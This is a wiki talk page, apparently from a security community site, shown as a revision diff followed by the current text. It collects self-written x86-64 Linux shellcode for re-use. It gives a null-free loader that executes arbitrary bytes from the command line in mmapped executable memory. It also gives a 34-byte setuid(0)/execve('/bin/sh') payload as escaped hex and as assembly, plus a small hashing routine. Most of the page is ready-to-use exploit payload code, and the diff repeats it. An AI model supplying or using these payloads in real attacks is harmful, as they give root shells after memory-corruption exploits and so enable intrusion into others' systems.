Questions about this topic? Sign up to ask in the talk tab.
Difference between revisions of "Category talk:Shellcode"
From NetSec
(Created page with "Hey guys, thought we could use some collections of this stuff for re-use purposes. Lets only contribute things we wrote ourselves, no copy pasting others' codes please! ~~~~ ==...") |
(→Small one-way hashing algorithm) |
||
(6 intermediate revisions by one other user not shown) | |||
Line 9: | Line 9: | ||
==== 64-bit ==== | ==== 64-bit ==== | ||
− | |||
+ | ===== Shellcode loader ===== | ||
+ | You shouldn't need to use this algorithm as a buffer overflow payload, but it's null-free just in case. For 64-bit linux kernel 3 systems. | ||
+ | |||
+ | '''Usage:''' | ||
+ | as inject.s -o inject.o ; ld inject.o -o inject | ||
+ | ./inject "$(echo -en "\x90\x90\x90")" | ||
+ | * The above example will execute 3 no ops. | ||
+ | {{code|text=<source lang="asm"> | ||
+ | .section .data | ||
+ | .section .text | ||
+ | .globl _start | ||
+ | |||
+ | _start: | ||
+ | pop %rbx # argc | ||
+ | pop %rbx # arg0 | ||
+ | pop %rbx # arg1 pointer | ||
+ | |||
+ | |||
+ | push $0x9 | ||
+ | pop %rax | ||
+ | |||
+ | xor %rdi, %rdi | ||
+ | push %rdi | ||
+ | pop %rsi | ||
+ | inc %rsi | ||
+ | shl $0x12, %rsi | ||
+ | |||
+ | push $0x7 | ||
+ | pop %rdx | ||
+ | push $0x22 | ||
+ | pop %r10 | ||
+ | |||
+ | push %rdi | ||
+ | push %rdi | ||
+ | pop %r8 | ||
+ | pop %r9 | ||
+ | |||
+ | syscall # The syscall for the mmap(). | ||
+ | |||
+ | begin_inject: | ||
+ | xor %rsi, %rsi | ||
+ | push %rsi | ||
+ | pop %rdi | ||
+ | |||
+ | inject_loop: | ||
+ | cmpb %dil, (%rbx, %rsi, 1) | ||
+ | je inject_finished | ||
+ | mov (%rbx, %rsi, 1), %r10 | ||
+ | mov %r10, (%rax,%rsi,1) | ||
+ | inc %rsi | ||
+ | jmp inject_loop | ||
+ | |||
+ | inject_finished: | ||
+ | inc %rsi | ||
+ | movb $0xc3, (%rax, %rsi, 1) | ||
+ | call *%rax | ||
+ | |||
+ | exit: | ||
+ | push $60 | ||
+ | pop %rax | ||
+ | xor %rdi, %rdi | ||
+ | syscall | ||
+ | </source>}} | ||
+ | |||
+ | ===== setuid(0); execve('/bin/sh'); - 34 bytes ===== | ||
+ | [[User:Hatter|Hatter]] 05:27, 19 August 2012 (MSK) | ||
* '''\x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05''' | * '''\x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05''' | ||
{{code|text=<source lang="asm"> | {{code|text=<source lang="asm"> | ||
Line 35: | Line 100: | ||
mov $0, %rdi | mov $0, %rdi | ||
syscall</source>}} | syscall</source>}} | ||
+ | |||
+ | ===== Small one-way hashing algorithm ===== | ||
+ | {{code|text=<source lang="asm"> | ||
+ | compute_hash: | ||
+ | xor %rcx, %rcx | ||
+ | xor %rdx, %rdx | ||
+ | |||
+ | compute_hash_again: | ||
+ | sub (%rax, %rdx, 1), %cl | ||
+ | rol $0xa, %rcx | ||
+ | inc %rax | ||
+ | cmp %dl, (%rax,%rdx,1) | ||
+ | jne compute_hash_again | ||
+ | ret | ||
+ | </source>}} |
Latest revision as of 14:51, 17 September 2012
Hey guys, thought we could use some collections of this stuff for re-use purposes. Lets only contribute things we wrote ourselves, no copy pasting others' codes please! Hatter 05:23, 19 August 2012 (MSK)
Contents
Collections
This page needs shellcodes, and will be updated with it shortly. Thanks for your patience. |
Windows
Linux
64-bit
Shellcode loader
You shouldn't need to use this algorithm as a buffer overflow payload, but it's null-free just in case. For 64-bit linux kernel 3 systems.
Usage:
as inject.s -o inject.o ; ld inject.o -o inject ./inject "$(echo -en "\x90\x90\x90")"
- The above example will execute 3 no ops.
.section .data .section .text .globl _start _start: pop %rbx # argc pop %rbx # arg0 pop %rbx # arg1 pointer push $0x9 pop %rax xor %rdi, %rdi push %rdi pop %rsi inc %rsi shl $0x12, %rsi push $0x7 pop %rdx push $0x22 pop %r10 push %rdi push %rdi pop %r8 pop %r9 syscall # The syscall for the mmap(). begin_inject: xor %rsi, %rsi push %rsi pop %rdi inject_loop: cmpb %dil, (%rbx, %rsi, 1) je inject_finished mov (%rbx, %rsi, 1), %r10 mov %r10, (%rax,%rsi,1) inc %rsi jmp inject_loop inject_finished: inc %rsi movb $0xc3, (%rax, %rsi, 1) call *%rax exit: push $60 pop %rax xor %rdi, %rdi syscall |
setuid(0); execve('/bin/sh'); - 34 bytes
Hatter 05:27, 19 August 2012 (MSK)
- \x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05
.section .data .section .text .globl _start _start: mov $0, %rdi mov $105, %rax syscall # a function is f(%rdi,%rdx,%rsi) mov $59, %rax # execve(filename, argv, envp) push $0x00 mov %rsp, %rdx # argv is null mov %rsp, %rsi # envp is null mov $0x0068732f6e69622f, %rcx push %rcx mov %rsp, %rdi # filename is '/bin/sh\0' syscall mov $60, %rax mov $0, %rdi syscall |
Small one-way hashing algorithm
compute_hash: xor %rcx, %rcx xor %rdx, %rdx compute_hash_again: sub (%rax, %rdx, 1), %cl rol $0xa, %rcx inc %rax cmp %dl, (%rax,%rdx,1) jne compute_hash_again ret |